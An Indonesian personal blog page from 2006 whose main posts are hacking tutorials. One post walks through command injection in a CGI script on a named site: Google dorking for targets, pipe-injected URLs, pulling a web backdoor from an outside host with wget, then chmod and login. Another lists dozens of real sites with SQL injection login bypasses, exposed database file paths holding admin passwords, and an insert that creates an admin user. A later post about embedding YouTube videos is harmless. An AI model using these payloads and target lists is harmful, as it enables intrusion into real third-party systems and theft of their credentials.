Friday, October 27, 2006

***EXPLOITASI COMMAND EXECUTION DI PERL / CGI***



gue nggak akan jelaskan mengapa command execution ini bisa terjadi,
Kalo ingin mengcari tahu, silahkan mencari di google dan baca …
So, Kita langsung ajah….

SATU :
Mencari Target…
1. Buka Opera, internet explorer, mozilla dll
2. Masukkan alamat www.google.com di address bar
3. Masukkan keyword pencarian.
Catatan :
Trick menggunakan keyword dalam mencari bug cgi / perl :
a. Gunakan words / kata2 yang mengarah secara langsung pada hal yang akan kita cari
b. Gunakan key “allinurl:”
c. Gunakan tanda petik ganda (“) jika diperlukan
contoh 1:
allinurl: “news.cgi?news=” txt
Ini akan mencari semua url yang mengandung url news.cgi?news=, dan file yang akan
Di buka yakni file dengan ektensi txt.
Contoh 2 :
allinurl: cgi action dat
ini akan mencari semua url yang ada kata cgi, action dan dat, jadi biasanya url yang
didapat adalah url yang mangandung file dengan akhiran .cgi ato .pl diikuti dengan
parameter action dan membuka file dengan ektensi dat.
(dengan key inilah bug WPS_SHOPPING ditemukan).
4. Oke sekarang kita telah memasukkan keyword yang kita inginkan. Dalam contoh ini
kita akan mengunakan keyword = allinurl: cgi action file dat -> lalu klick cari/search
dan hasilnya ………………………………………..:

DUA:
Exploitasi:

1. Sekarang kita masuk ke exploitasi :
Dalam exploitasi cgi/perl sangat mudah sekali. Yakni kita hanya memerlukan dua
Karackter penting yaitu ‘|’ dan ‘;’ yang di letakkan pada tempat nama file yang akan
dibuka.
Sebagai contoh:
Sekarang kita lihat url pada halaman pertama, yakni :
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat&page=0
Klick kanan url tersebut dan klick open in new window.
Setelah terbuka alamat url tersebut, Sekarang kita tambahkan character penting
tersebut diatas, yakni pipe ‘|’. Pada akhir nama file yang akan dibuka yakni :
file=.file0011.dat|ls|
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|ls|&page=0
(ls dalam command di linux shell adalah sama dengan dir pada windows, yakni
melihat seluruh file directory aktif)
yupe, sekarang kita bisa melihat pada tampilan halaman, ada perubahan tampilan,
yakni disitu terlihat yang semula berisi huruf2 jepang, sekarang ada tulisan file. Itu
artinya webserver tersebut vulnerable untuk di hack…!!!!
Catatan: Tidak semua file cgi yang vulnerable ketika kita tambahkan char ‘|ls|’
Akan menampilkan file2-nya di browser. Ada yang tidak terlihat dan ada yang terlihat.
Yupe, sekarang coba kita lihat id kita:
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|id|&page=0
hasilnya : uid = bla bla bla
Asal uid bukan nobody, maka kita nggak akan kesulitan untuk langkah selanjutnya.

2. Memasukkan backdoor. (web backdoor)
Kita bisa memasukkan beberapa jenis backdoor seperti bindtty dll............
Kenapa saya memilih web backdoor..??? karena web backdoor ini merupakan
Backdoor yang sangat ampuh (menurut saya). Sulit di deteksi (apalagi kalo pake
penyamaran nama file yang bener2 ok)
Tidak terpengaruh oleh firewall dan admin web pada saat mengecek koneksi yang
terjadi pada web-nya, yang mereka tau adalah kita hanya seperti browsing biasa.
Karena kita melakukannya lewat port 80….!!!
Saya menggunakan backdoor dari "http://www.rohitab.com/cgiscripts/cgitelnet.txt"
Baik sekarang kita akan melakukan uploading backdoor tersebut ke web target.
Dalam mengupload backdoor, kita akan menggunakan command wget. Yakni
command di linux yang khusus untuk download ke web server.
Catatan :
Tidak semua server menginstall wget, dan jika itu terjadi, maka pilihan kita selanjutnya
Adalah menggunakan lwp-download, fasilitas download dari perl.

Contoh : http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|wget http://www.rohitab.com/cgiscripts/cgitelnet.txt|&page=0
Kita mengambil cgitelnet.txt dari http://www.rohitab.com/cgiscripts/cgitelnet.txt,
Yang selanjutnya akan di save di http://www.mikazo.net/cgiscript/sample/zdiary/
Sekarang kita check apakah kita berhasil ato tidak.
http://www.mikazo.net/cgiscript/sample/zdiary/cgitelnet.txt
jika ada pesan error file not found, berarti kita gagal menggunakan wget, selanjutnya
kita coba alternatif kedua : http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|lwp-download http://www.rohitab.com/cgiscripts/cgitelnet.txt|&page=0
sekarang kita chek lagi :
http://www.mikazo.net/cgiscript/sample/zdiary/cgitelnet.txt
Yupe sekarang ada tampilan source dari cgitelnet.txt.
Selamat berhasil….!!!! :P~
Baik sekarang apa selanjutnya..???
Selanjutnya adalah kita harus merubah nama cgitelnet.txt ke cgitelnet.cgi dan merubah
Chmod-nya ke 755 agar kita bisa mengexekusi-nya.
a. Merubah nama cgitelnet.txt ke cgitelnet.cgi
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|mv cgitelnet.txt cgitelnet.cgi|&page=0
b. Merubah chmod ke 755
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|chmod 755 cgitelnet.cgi|&page=0

TIGA :
Execkusi backdoor dan selancar di system target

Oke, sekarang kita telah berhasil memasukkan backdoor ke web target. Sekarang coba
kita exekusi:
http://www.mikazo.net/cgiscript/sample/zdiary/cgitelnet.cgi
tampilan yang muncul adalah :
login: admin
password: enter

baik sekarang kita masukkan password. Password = changeme
daaaannn…. Hasilnya adalah :

[admin@www.mikazo.net /home/s20144-1/public_html/cgiscript/sample/zdiary]$

selesai….!!!!!

Oke, sekarang info:
Pada contoh di atas, saya menggunakan bug pada zdiary.cgi.
zdiary v1.51, v1.52 (all version) by mikazo
untuk mencari webserver yang menginstall zdiary, gunakan key word pada google
sebagai berikut :
allinurl: “zdiary.cgi”

 

Posted by -=:.BrownSugarFree.:=- at 6:37 PM | | Comments

-=inject database website =-

 ***************** ßy: brownsugarfree******************







http://www.dolphinstreetdesigns.net/shopping/shopdbtest.asp
http://www.armoredplanet.com/vpshop/shopdbtest.asp
http://www.mediablend.com/demos/ecommerce/mbstore/store/shopdbtest.asp
http://www.freewebfront.com/admin/orders.asp
http://www.gpscompany.com/necart/lor/admin/orders.asp
https://secure.digiweb.net.nz/modchipsconz/admin/upload.htm
http://www.bruinstuff.com/ProductCart/pcadmin/login.asp?idadmin='' or 1=1--
http://www.myeventshots.com/ProductCart/pcadmin/login.asp?idadmin='' or 1=1--
http://www.virtualimpact.net/productcart/pcadmin/login.asp?idadmin='' or 1=1--
http://www.idream.com.sg/productcart/pcadmin/login.asp?idadmin='' or 1=1--
http://www.danitasboutique.com/ProductCart/pcadmin/login.asp?idadmin='' or 1=1--
http://www.thecarshopnj.com/productcart/pcadmin/login.asp?idadmin='' or 1=1--
http://www.indiarc.netfirms.com/cgi-bin/album/album.pl?photo=DrPonidi.jpg
http://images.girly-geek.com/cgi-bin/album.pl?photo=/pon.jpg
http://www.hbr11.com/cgi-bin/album.pl?photo=DR`PONIDI/pon.jpg
http://www.comersus.com/message.asp?message=Dr`Ponidi+minta+ccnya+dong
http://myanmarbestbuy.com/store/comersus_message.asp?message=
http://www.eltiante.com/shop/store/comersus_message.asp?message=
http://extremetracking.com/free-1/scripts/reports/display/nph-edit.cgi?tag=tigcgi&server=z
http://cheiron.humanities.mcmaster.ca/~htp/cgi/edit.cgi?22
http://www.worldwidewiki.net/wiki/OneBigWikiAlphabeticalIndexS/edit
http://www.worldwidewiki.net/wiki/OneBigWiki/edit
http://urchin.earth.li/cgi-bin/twic/wiki/view.pl?page=RSS







*****Sample*****

http://www.1616us.com/shop/shopadmin.asp login=ylp34a# pass=prod43@
http://www.prc-cosmetics.com/asp/newver/mbh/com/xinqi/manage/login.asp L:admin P:' or '1' = '1
http://www.sdi.com.tw/manage/login.asp L:sdi P:sdi / L:sdi P:' or '1' = '1
http://www.slimlife.biz/manage/login.asp? L:admin P:' or '1' = '1
http://www.nlio.idv.tw/disaster/manage/login.asp L:admin P:' or '1' = '1
http://www.lobsterclub.co.kr/news/list.asp L:admin P:' or '1' = '1
http://teayang.co.kr/manage/Default.asp L:admin P:' or '1' = '1
http://www.kmistc.com/manage/default.asp L:admin P:' or '1' = '1
http://www.yxsz.yn.cn/manage/login1.asp L:admin P:' or '1' = '1
http://bikmrdc.lm.fju.edu.tw/manage/login.asp L:admin P:' or '1' = '1
http://www.erp-china.com/Information/infomanage/login.asp L:admin P:' or '1' = '1
seongdong.seoul.go.kr/%EC%84%B1%EB%8F%99%EC%A7%80%EC%97%AD%EA%B2%BD%EC%A0%9C/ manage/login.asp L:admin P:' or '1' = '1
chinaqd-tianrun.com/zengrun/manage/login.asp L:admin P:' or '1' = '1
http://demo.bechoice.com/newsii/manage/login.asp L:admin P:' or '1' = '1
http://www.0577china.com/glasses/manage/login.asp L:admin P:' or '1' = '1
http://ba.lm.fju.edu.tw/singing/ib/MANAGE/login.asp L:admin P:' or '1' = '1
http://www.daeholoan.com/manage/login.asp L:admin P:' or '1' = '1
http://www.gesfim.fr/Manage/login.asp L:admin P:' or '1' = '1
http://www.sggs-cn.com/manage/login.asp L:admin P:' or '1' = '1
http://www.ebooth.com.tw/manage/login.asp L:admin P:' or '1' = '1
http://www.dachangyt.com/lijing/manage/login.asp L:admin P:' or '1' = '1
http://www.516700.com/htgirl/manage/login.asp L:admin P:' or '1' = '1




/fpdb/shop.mdb
/shoponline/fpdb/shop.mdb
/database/metacart.mdb
/shopping/database/metacart.mdb
/shop/database/metacart.mdb
/metacart/database/metacart.mdb
/mcartfree/database/metacart.mdb
/ASP/cart/database/metacart.mdb




http://www.premierhawaii.com/Shopping/ivan.mdb
http://www.exclamationscubancigars.com/cgi-bin/shopping350.mdb
http://www.norteamengros.no/shop/shopping400.mdb
http://www.aamx.com/shopping450.mdb
http://www.onlinedancing.com/shop/shopping.mdb
http://www.missouririvertraders.com/shopping/missouri.mdb
http://www.jinhuaham.com/newshop/shopping.mdb
http://www.copperfast.com/metacart/metacart.mdb
http://www.ocie.com/metacart/metacart.mdb
http://www.scrappingcorner.com/productcart/pcadmin/eipc.mdb
http://glasspec.com/productcart/pcadmin/eipc.mdb
http://www.nexostherapeuticals.com/productcart/pcadmin/eipc.mdb
http://www.azardisplays.com/productcart/pcadmin/eipc.mdb

-----------------------------------------------------------------

************Sample**************


https://secure.wetplanet.com/comersus/backofficelite/comersus_backoffice_index.asp
https://secure.wetplanet.com/comersus/backofficelite/comersus_backoffice_rc4Exec.asp
https://secure.wetplanet.com/comersus/backofficelite/comersus_backoffice_menuUtilities.asp



http://www.digitalive.hpg.com.br/database/comersus.mdb
http://members.xoom.virgilio.it/superand/comersus/database/comersus.mdb
http://www.digiser.ritex.com/tienda2/database/COMERSUS.mdb
http://home.bhak-voitsberg.ac.at/students/1538reicher/comersus/database/comersus.mdb
http://www.musiceducationcenter.com/comersus/store/comersus.mdb

----------------------------------------------------------------------------

cari file data basenya yang extensinya .mdb file ini bisa di buka dengan microsoft acces terbaru, dan berisi login dan pass admin nya.
RUMUSNYA:
http://[vp-asp site]/[vp-asp dir]/[xDatabase + .mdb]
http://[vp-asp site]/[vp-asp dir]/shopdbtest.asp --> untuk mengetahui nama file data basenya. bisa juga mengetahui lokasi filenya.
http://[vp-asp site]/[vp-asp dir]/shopa_sessionlist.asp --> ini untuk mengetahui posisi/ letak file mdb nya.


misal : www.toko.com/shop/toko.mdb
www.target.com/cgi-local/shopper.cgi?preadd=action&key=...
www.target.com/cgi-bin/shopper.cgi?preadd=action&key=...
www.target.com/cgibin/shopper.cgi?preadd=action&key=..
www.target.com/cgi-local/shopper.cgi?preadd=action&key=...


RUMUSNYA:
http://[vp-asp site]/[vp-asp dir]/[xDatabase + .mdb]
http://[vp-asp site]/[vp-asp dir]/shopdbtest.asp --> untuk mengetahui nama file data basenya. bisa juga mengetahui lokasi filenya.
http://[vp-asp site]/[vp-asp dir]/shopa_sessionlist.asp --> ini untuk mengetahui posisi/ letak file mdb nya.



***********Injection (jar)***************


insert into tbluser ("fldusername","fldpassword","fldaccess") values ('ascii','ascii','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')--


===========================================================================================================

Posted by -=:.BrownSugarFree.:=- at 6:27 PM | | Comments

-=Add In Video To BloGs With You Tube=-






 YouTube is probably the most famous video sites on the web with people watching more than 70 million videos on the site daily. No wonder once in a while you would like to add a video to your blogger blogs. But if you don’t want to spend too much time and effort in figuring out a way to get things done and looking for a step-by-step tutorial to do it then this is the post tailor made especially for you. So what are we waiting for? Lets get down to the business.

You can do it in two ways - geeky or non-geeky way! Geeky method would need you to play with html code a bit while second method do it for you. The benefit of geeky method is less time

First the non geeky way!

At the time of writing this article only registered YouTube members can use the GUI to upload these videos on their blogs and currently it only support Blogger.com and LiveJournal blogs. So you would need to login with your you-tube account to do this. Don’t worry, registration is free and takes only few minutes.

1.Once you have logged in, you can upload the video of your choice by clicking on the “Blog Video” link given in the box just below the video.

2.On clicking the link a small window will pop-up, click on the “Click here” link to add your blogspot blog for the first time. On clicking this link a new window will open.

3.Click on “Add a New Blog” link. As of now only Blogger and LiveJournal blogs are supported by YouTube.
4.In the new window enter your blogger account username and password. Click on the “Add Blog” button.

5.Once entering the correct user id and password all the blogs in your profile would be shown, check the box next to your blog of choice.
6.Now that your blog is added to the list just click “refresh in the pop-up box below the video.
7.Now choose the blog from drop down menu and enter title and text of your choice. But there is on thing to note that the “title” you enter in this box is not the title of your blog post, its going to remain empty. This “title” text is actually bold texts of your blog post and “text” is usual body.


That’s it, just click “Post to Blog” and check your blog for new post, you might have to refresh to see the changes.

Now the Geeky way!

Open up you blogger post editor and click on edit ”Edit Html” tab. Now all you have to do is copy the embed code from video page and paste it to your text editor. you can find your embed code in the top right corner of the video page.

Posted by -=:.BrownSugarFree.:=- at 5:48 PM | | Comments

-=::photoshoplah pokoknya::=-






 

Posted by -=:.BrownSugarFree.:=- at 4:38 PM | | Comments

-=::all about me::=-


 

Posted by -=:.BrownSugarFree.:=- at 3:49 PM | | Comments

About me

  • I'm -=:.BrownSugarFree.:=-
  • From JaKArtA Yang MEgApolis, Indonesia
  • just close and disclosure for sure.... terima kasih kepada 4JJ swt yang telah memudahkan jalanku untuk menempuh segalanya dan nikmat yang telah diberikanNya kepada diri gue...... yang telah memberikan diri gue pikiran dan badan untuk digunakan semaksimal mungkin sehingga mencapai apa yang terbaik dari diri gue.................
My profile

Search


Last posts

Archives

Links

Subscribe to this blog's feed
[What is this?]
Powered by Blogger
& Blogger Templates